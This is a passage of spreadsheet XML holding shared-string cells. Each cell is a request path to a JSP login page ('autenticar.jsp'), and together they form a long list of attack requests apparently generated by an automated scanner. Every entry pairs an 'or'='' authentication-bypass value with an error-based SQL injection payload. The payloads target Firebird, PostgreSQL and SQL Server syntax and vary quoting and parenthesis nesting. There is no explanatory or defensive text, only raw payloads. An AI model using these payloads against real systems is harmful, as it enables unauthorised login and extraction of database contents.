    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(9910=9910&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((949=949&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(((4333=4333&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and('knvr'='knvr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(('ouib'='ouib&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((('vczq'='vczq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and'gxtw'='gxtw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and('gcpt'like'gcpt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(('zcpz'like'zcpz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((('slxq'like'slxq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and'ayse'like'ayse&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and("ieqt"="ieqt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(("avna"="avna&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((("wmkl"="wmkl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and"vtxi"="vtxi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and("jzdd"like"jzdd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(("bhkx"like"bhkx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((("flln"like"flln&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and930=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase930when930then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and"tuqa"like"tuqa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7699&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7332)or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5176&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1784')or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9632'or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2046&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1529"or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4368&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5980)or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(9173=9173&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2365&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3976))or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((493=493&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4447&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8296)))or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(((3747=3747&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9457&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-254or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9821&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3241')or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and('hfua'='hfua&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5827&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5490'))or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(('ingv'='ingv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9611&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6050')))or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((('brqg'='brqg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7534&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4870'or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and'swbp'='swbp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5012&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9066')or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and('ankv'like'ankv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4587&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2628'))or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(('eyfg'like'eyfg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2807&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-724')))or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((('lqno'like'lqno&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5348&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8982'or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and'ffjz'like'ffjz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7824&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6147")or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and("pdsf"="pdsf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-603&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4966"))or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(("eabq"="eabq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9102&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9866")))or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((("sqdb"="sqdb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1419&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4620"or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and"nerf"="nerf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4050&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-797")or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and("cfdh"like"cfdh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9555&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4223"))or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(("zvei"like"zvei&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4209&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4988")))or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((("rbel"like"rbel&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1690&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1263"or3590=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3590=3590)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and"icnl"like"icnl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2469&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5781)or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-727&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1094')or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6347&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-853'or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4280&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3458"or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7668&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1767)or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(4166=4166&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1681&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2881))or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((5578=5578&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4800&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2037)))or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(((1549=1549&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7475&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2326or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4969&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7721')or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('zntk'='zntk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4854&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9245'))or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('zeso'='zeso&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8454&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2506')))or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('psik'='psik&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8873&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-140'or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'mplb'='mplb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6771&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3274')or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and('bois'like'bois&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5650&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6758'))or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and(('ztcv'like'ztcv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9124&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1321')))or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and((('fdda'like'fdda&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9040&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3855'or6990=convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6990=6990)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58)))and'ivpo'like'ivpo&amp;modo=entrar</t>
  </si>
  <si>
